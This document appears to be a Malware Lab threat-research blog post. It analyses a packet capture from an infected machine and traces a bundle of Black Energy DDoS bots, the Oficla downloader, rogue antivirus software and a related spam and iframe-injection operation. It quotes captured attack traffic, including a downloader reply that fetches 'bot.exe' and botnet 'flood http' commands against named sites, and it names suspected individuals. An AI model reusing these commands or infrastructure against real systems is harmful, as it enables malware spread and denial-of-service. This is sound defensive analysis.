Russian Malware Bundle



by Nart Villeneuve

This Malware Lab blog post analyzes a packet capture file from an infected computer associated with a political figure. While evidence of compromise was found, the malware infection is most likely unrelated to political activities and was not a targeted attack. Rather, the infection is related to the criminal activities of attackers based in Russia or the Ukraine.

Key findings:

  • From the malware connections recorded in the packet capture file we were able to discover malware that bundled a Black Energy bot with the “Oficla/Sasfis” Trojan downloader as well as known rogue/fake anti-virus software.
  • We were able to access an interface to the Black Energy botnet that was not secured and observed the attackers conduct a brief DDoS attack.
  • Despite being a Russian botnet, many of the domain names were .cn and many IP addresses were Chinese.
  • This network is linked with an operation that spams nearly 4.3 million email addresses with gambling, pornography, pharmaceuticals, rogue AV software and other malware. It is also linked with an iframe injection campaign.

Background

In 2008, Steven Adair, from Shadowserver, noted that the Black Energy botnet was moving beyond just DDoS attack to other areas of cybercrime.

Black Energy this year went from just DDOSing to spreading keyloggers to steal credentials and passwords, Adair says. Like other botnets, it has been updating itself with new malware.1

In fact this appears to be the case for a variety of botnets. Dancho Danchev states groups that used to specialize in DDoS attacks are “‘vertically integrating’ in order to occupy as many underground market segments as possible.”2

Another interesting observation by Danchev, that is supported by this investigation, is that DDoS vendors are attacking non-political sites in order to avoid drawing attention to themselves. Danchev explains:

It’s also worth pointing out that a huge number of “boutique vendors” of DDoS services remain reluctant to initiate DDoS attacks against government or political parties, in an attempt to stay beneath the radar. This mentality prompted the inevitable development of “aggregate-and-forget” type of botnets exclusively aggregated for customer-tailored propositions who would inevitably get detected, shut down, but end up harder to trace back to the original source compared to a situation where they would be DDoS the requested high-profile target from the very same botnet that is closely monitored by the security community.3

Instead, they focus on extortion schemes in which they charge for a protection racket (to not DDoS a web site) as well as encouraged “protected” sites to DDoS their competitors.

Now that various attacker groups have diversified it is difficult to distinguish their activities from one another. Different groups propagate eachother’s malware or use what FireEye calls a “BotnetWeb” which is defined as:

A collection of heterogeneous Botnets being operated in conjunction with each other controlled by one or more closely linked cyber criminal group(s).4

Some of this may be the result of splintering among more well established groups. The ThreatFire blog suggests that the Storm group has broken into several groups with some now teaming up with rogue AV’s.5 This realignment of criminal actors may partially explain the diversification of malware.

However, there also appears to be a significant role for “middlemen” who simply propagate content, whether it be advertisements, iframe injection, rogue AV’s, or botnet software.

Packet Capture

The packet capture from the infected computer shows a variety of malware activity. While the malware activity may be related there appears to be different types.

The infected computer connected to four control servers:

sexigood.ru (daro-x@yandex.ru)
81.176.232.103 – NEOWEB HOSTING, RU

091809.ru (bazhenov@mail.ru)
210.51.166.238 – China Netcom, CN

zflaersroot.cn (tem.ponakuru@mail.ru)
210.51.166.233 – China Netcom, CN

moneybizness.ru (belov@pisem.net)
210.51.10.184 – China Netcom, CN

The captured network traffic shows a connection from the infected computer to sexigood.ru (81.176.232.103) and a file “ R23.exe” is downloaded.

GET /1/R23.exe HTTP/1.0
Host: sexigood.ru

An automated analysis of “ R23.exe” by ThreatExpert shows that connections are issued to 091809.ru (210.51.166.238) and zflaersroot.cn (210.51.166.233) as well as core2724.openbiglibrarynow.com (94.125.90.163).6 However, the captured network traffic from the infected computer does not show any connections to core2724.openbiglibrarynow.com (94.125.90.163, IntTranspNet, RU).

Black Energy

Black Energy is a botnet toolkit and its primary functionality is Distributed Denial of Service (DDoS) attacks. The bots communicate with command and control server using the HTTP protocol. It is used by Russian hackers and Black Energy botnet kits can be purchased for about $40. There are at least 30 distinct Black Energy botnets.7 According to Arbor Networks, Black Energy botnets were used in the DDoS attack on Georgia in 2008.8

The captured network traffic from the infected computer does show a connection to 091809.ru (210.51.166.238) is a check-in:

POST /1/stat.php HTTP/1.0
Host: 091809.ru
id=x———-_382C0098&build_id=.8

HTTP/1.1 200 OK
MTA7MjAwMDsxMDsxOzI7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3dhaXQjMTAjeC0tLS0tLS0tLS1fMzgyQzAwOTg=

The response from the C&C is base64 encoded, when decoded it is:

10;2000;10;1;2;30;100;3;20;1000;2000#wait#10#x———-_382C0098

Further analysis of the Black Energy control server at 091809.ru (210.51.166.238) revealed the command interface that the attacker uses to issue commands to infected computers. According to the statistics in the interface the attackers had 2044 active bots, an average of 2418 per hour and 8105 per day. In total the attackers recorded 64346 infections.

bundle1

Further investigation revealed the command interface for another Black Energy control server on the same IP address, sexiland.ru (210.51.166.238, China Netcom) was also accessible. According to the statistics in the interface the attackers had 3623 active bots, an average of 4869 per hour and 12749 per day. In total the attackers recorded 51813 infections.

bundle2

During the investigation the attackers began a DDoS attack against “81.176.239.67” with the command:

flood http 81.176.239.67

The IP address is assigned to “Erix colocation and vps service” in Moscow, Russia and the only domain we found that resolved to this IP address is, vernem-prava.ru, which appears to be a web site selling services to obtain Russian driver’s licenses. The command was changed back to “wait” shortly thereafter.

bundle3

Several minutes later the following command was issued on both Black Energy control servers which had a total of 5387 active bots at the time.

flood http www.vernem-prava.ru index.html

We also observed both command and control servers issues addition DDoS commands:

flood http besticq.ru
flood http www.newkaliningrad.ru forum
flood http wepn.ru
flood http 212.112.224.168

(The version of Black Energy running on these servers appears to be 1.7 as new files introduced with Black Energy 1.8 do not appear on these servers.9)

Oficla/Sasfis

After the connection to 091809.ru, there was a connection to zflaersroot.cn (210.51.166.233) where the infected computer is directed to download “bot.exe” from moneybizness.ru (210.51.10.184):

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]runurl:http://moneybizness.ru/bot.exe|taskid:43|delay:30|upd:0|backurls:[/info]

An automated analysis of “bot.exe” shows that it connects to 091809.ru (210.51.166.238).10 Follow-up requests to zflaersroot.cn (210.51.166.233) instructed the infected computer to “delay.”

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]kill:0|delay:30|upd:0|backurls:[/info]

This behaviour is identical to Win32/Oficla, a trojan downloader.11 In this case the Oficla download instructs the infected computer to download “bot.exe” which connect to the Black Energy control server.

Rogue AV’s

The malware file “R23.exe,” which the original infected computer downloaded from sexigood.ru (81.176.232.103), connected to to 091809.ru (210.51.166.238), the Black Energy control server, zflaersroot.cn (210.51.166.233), the Oficla/Sasfis control server, as well as a URL associated with rogue/fake antivirus software.12

hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=1&a=2724
hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=3&a=2724
hxxp://core2724.openbiglibrarynow.com/stget2.cgi?host=host&id=2724

In fact, there were additional malware files in the same directory as “R23.exe” on sexigood.ru (81.176.232.103) including “8.exe,”13 “R31.exe”14 and “Windows_Protector.exe.”15 An analysis of “ Windows_Protector.exe” showed that it downloaded another files named “PC_protect.exe” from core2724.openbiglibrarynow.com (95.211.26.5, NL-LEASEWEB, NL).16

This URL was found in hxxp://scanyourpc-fastx.com/pdm/x.exe “ Windows_Protector.exe.” The “x.exe”17 from scanyourpc-fastx.com (89.208.41.253, DINETHOSTING, RU) file connects to d45648675.cn (91.212.226.60) and begins an SSL encrypted session.
The files that were on sexigood.ru (81.176.232.103) were replaced with “Bee.dll,”18 “ked.exe,”19 “win2ext.exe,”20 and “Windows_Protector.exe.”21 The “win2ext.exe” file connected to www.guruman.cn (210.51.181.69, E-Icann, China Netcom, CN) and perenils.cn (91.212.220.143, Group Vertical Ltd, RU).

“rundll32”

There were some connections, which appeared to be unrelated to the malware analyzed above, requesting “/toolbarprofit/images/body_bg_bot.jpg” from the IP address “66.197.149.41” (Network Operations Center Inc., US) with the host header “www.pay-per-install.info.” These connections are redirected “www.fbi.gov.” Software that connects to the IP address, “66.197.149.41,” is under review by PrevX.22

GET /toolbarprofit/images/body_bg_bot.jpg HTTP/1.0
Referer: http://www.pay-per-install.info/
Host: www.pay-per-install.info

HTTP/1.1 301 Moved Permanently
Server: nginx
Location: http://www.fbi.gov/

The domain “www.pay-per-install.info” resolves to “127.0.0.1” and is an alias for “ddos.fuckingtest.net.”

$ host www.pay-per-install.info
www.pay-per-install.info is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Searches focused on “toolbarprofit” yielded an individual known as “rundll32” using the email address “toolbarprofit@gmail.com” and the ICQ number “561194042.”

bundle4

There is a post by “rundll32” that advertises an “affiliate” program that is “not detected by any antivirus.” In this post “rundll32” advertizes the ICQ number “551802661” and the website “rundll32.ru.” The same text has been posted on a variety of Russian hacker forums.23

bundle5

While rundll32.ru resolves to 95.211.27.177 (NL-LEASEWEB, NL), www.rundll32.ru exhibits the same behaviour as www.pay-per-install.info:

$ host www.rundll32.ru
www.rundll32.ru is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Our investigation then focused on the email address, “rundll32@yandex.ru”, which was used to register rundll32.ru. A search for “rundll32@yandex.ru” returns a paper written by Alexander V. Prokhorov (or Prochorov), a student at Moscow State University, Russia.

bundle6

The same search also returned a server that is being used for spam as well as iframe injection. In fact, “rundll32@yandex.ru” appears on a large spam list of 4,288,450 email addresses. There were a variety of templates as well as tools for sending spam located on the server across the following domains al of which are hosted on the same IP address (216.120.237.31, HostRocket Web Services, US): burkecoaching.com rentaplayer.com snowdomain.com solutionmgmt.com syattenterprises.com trailingfirecards.com noc8.com and strategymanagementinc.com.

bundle7

bundle8

In addition, we found a variety of redirects to various pornography sites as well as a pharmaceutical site, drugstopzap.com, and rogue AV sites. For example, the site, hxxp://destinybeijing.cn/?pid=156&sid=3f9ecd, redirects to hxxp://detect-spyware7.com/scan1/?pid=156&engine=pHT43Tj4NjEwMC4yMjkuNTYmdGltZT0xMjUuNYIMPAZM where the user is forced to download rogue AV software.24

bundle9

bundle10

bundle11

We also found that some pages redirected users to “counterweb.cn” which is hosted on the same IP address, 210.51.166.238 (China Netcom, CN) as the Black Energy command and control servers 091809.ru and sexiland.ru. The connections to counterweb.cn:

GET /t/out.php HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?default

GET /sutra/in.cgi?default HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?2

GET /sutra/in.cgi?2 HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://google.com

We also found a variety of malicious javascript and iframes that loaded the following URLs:

hxxp://000007.ru/in.cgi?7 (92.241.177.223, NETPLACE, RU)
hxxp://javascrlpt.com/s/in.cgi?8
hxxp://newsmeta.net/s/in.cgi?8 (213.163.89.35, Telos Solutions, NL)
hxxp://veryblomar.com/vb/in.cgi?2 (69.64.155.121, eNom, US)

The domain, 000007.ru has been hosting “Windows_Protector.exe” which is the rogue AV we also found on sexigood.ru (81.176.232.103).25 The domain, javascrlpt.com was found serving Zeus related binaries from a Chinese IP address.26 All these domain names appear to have been used in iframe injection attacks.

Additional searches reveal web sites that contained similar scripts and tools as those used on the domains listed above including dark-studio.by.ru, erre-way.by.ru and www.exterv.com.

Storm

There was another connection of interest in our packet capture sample to “78.159.121.122” (NETDIRECT-NET, DE) which is very similar to the connection between a Storm “supernode” and a “subcontroler” as described by SecureWorks’ Joe Stewart.29

POST /u/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Internet Explorer
Host: 78.159.121.122
Content-Length: 712
Pragma: no-cache

a=ZYCmeXPQwHEj9qGWsUqvzJf0nNCYaVvxlGKWOu3H4Gr[…]&b=RlzWZPqmoRdB1XyjNGfn1GC3n5KdXpmROtMz33ItiXrNIJyw[…]

HTTP/1.1 200 OK
Date: Tue, 13 Oct 2009 08:30:16 GMT
Server: Apache/2.2.11 (FreeBSD) PHP/5.2.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.9
Content-Length: 28
Connection: close
Content-Type: text/html

#���(NöÎ(5ëÊ9J#!švÝôÐpo°à¢Ëµ

According to Joe Stewart the “master” control server is often protected by another nginx server. However, the server on 78.159.121.122 appears to be Apache.

It is unclear if this is related to the malware “bundle” described in this post.

Notes

1 http://www.darkreading.com/security/management/showArticle.jhtml?articleID=211201241

2 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

3 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

4 http://blog.fireeye.com/research/2009/11/killing-the-beastpart-4.html

5 http://www.blogcatalog.com/blog/threatfire-research-blog/56298e2ced094ff86574560566e158a1

6 http://www.virustotal.com/analisis/46841255cd4e91cf93c74c539c13cf57beea6ec33c0c6502c2d14fb7182ce7ef-1256048818 and http://www.threatexpert.com/report.aspx?md5=6de4aeaca08b57339e2890a35c84a968

7 http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf

8 http://asert.arbornetworks.com/2009/01/russia-opposition-websites-and-ddos/

9 http://malerisch.net/docs/black_energy_ddos_1_8/blackenergy18.ppt

10 http://www.threatexpert.com/report.aspx?md5=78919f875e9cea75a491b8d620453d1b and http://www.virustotal.com/analisis/69ed9c0fdb9a0ac4631acba396cd22569a4670965017b6903cef050c63eaa0d6-1256051615

11 http://www.malwareurl.com/search.php?domain=&s=Oficla&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on and http://www.threatexpert.com/report.aspx?md5=8ba3f334d7c840c08317eed8274478d2

12 http://www.malwaredomainlist.com/mdl.php?search=openbiglibrarynow.com

13 http://www.virustotal.com/analisis/d32c1247b9cc80db7c50bd0b91d3a4d523672e9c238f99e1972b75d04340ab88-1255645683 and http://www.threatexpert.com/report.aspx?md5=0d431ffb676be2c091eda0445282b59e

14 http://www.virustotal.com/analisis/8e0df4b3e31afd1e73d68bdf7bb3f35c61d9d12cf35c0d36a8b0d98459b88b40-1255645829 and http://www.threatexpert.com/report.aspx?md5=4672d5000ea2ed47ff7089666bf18186

15 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1255652491 and http://www.threatexpert.com/report.aspx?md5=43ec3ee7742dc809dc2690508b111ddf

16 The IP address changed.

17 http://www.virustotal.com/analisis/9d8ea6a2706f4a12c0fa78185811f31a9a64984d7f37667f73b7b5fba345a281-1256064976 and http://www.threatexpert.com/report.aspx?md5=18a5036b5855f40f8bf1bc37e7712115

18 http://www.virustotal.com/analisis/ab462e64ee3b87ef775ebd361e2290d02544aeb3df91c132a69c8cc3c7737d46-1256065684

19 http://www.virustotal.com/analisis/863f9a65b9496ce991a6a4d7d0cfd6260b290a59e16e14eab64ce2ac1a80836d-1256065745

20 http://www.virustotal.com/analisis/3cd06a2911f0b9e98b50dcb1148b7d12743a17b0c30ae707d240ba36b6f0e043-1256005930 and http://www.threatexpert.com/report.aspx?md5=7d73fe4a05fbc21a32fa620d92587102

21 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1256016137

22 http://spywarefiles.prevx.com/RRDEFI44668732/ITUN~KA2.EXE.html and http://www.prevx.com/filenames/X824695795861965386-X1/LATEST5FUPDATE.EXE.html

23 http://forum.xakep.ru/m_1578962/mpage_1/key_/tm.htm#1578962 , http://74.125.95.132/search?q=cache:YeAN_Ax_3oMJ:secnull.ru/lofiversion/index.php/t2214.html+%22561194042%22&cd=10&hl=en&ct=clnk&gl=ca

24 http://www.virustotal.com/analisis/be2a26d07f7bdb14b72a1e21369744859bce7a77b820196a58c64bd4bf0c62ca-1256670552

25 http://www.malwaredomainlist.com/mdl.php?search=000007.ru

26 http://www.malwaredomainlist.com/mdl.php?search=javascrlpt.com

27 When connecting directly to the requested file, a 403 HTTP header is received, however, when connecting with “www.pay-per-install.info” as the host header the browser is redirected to www.fbi.gov.

28 http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ and http://news.cnet.com/8301-10789_3-10040669-57.html and https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

29 https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Post a comment.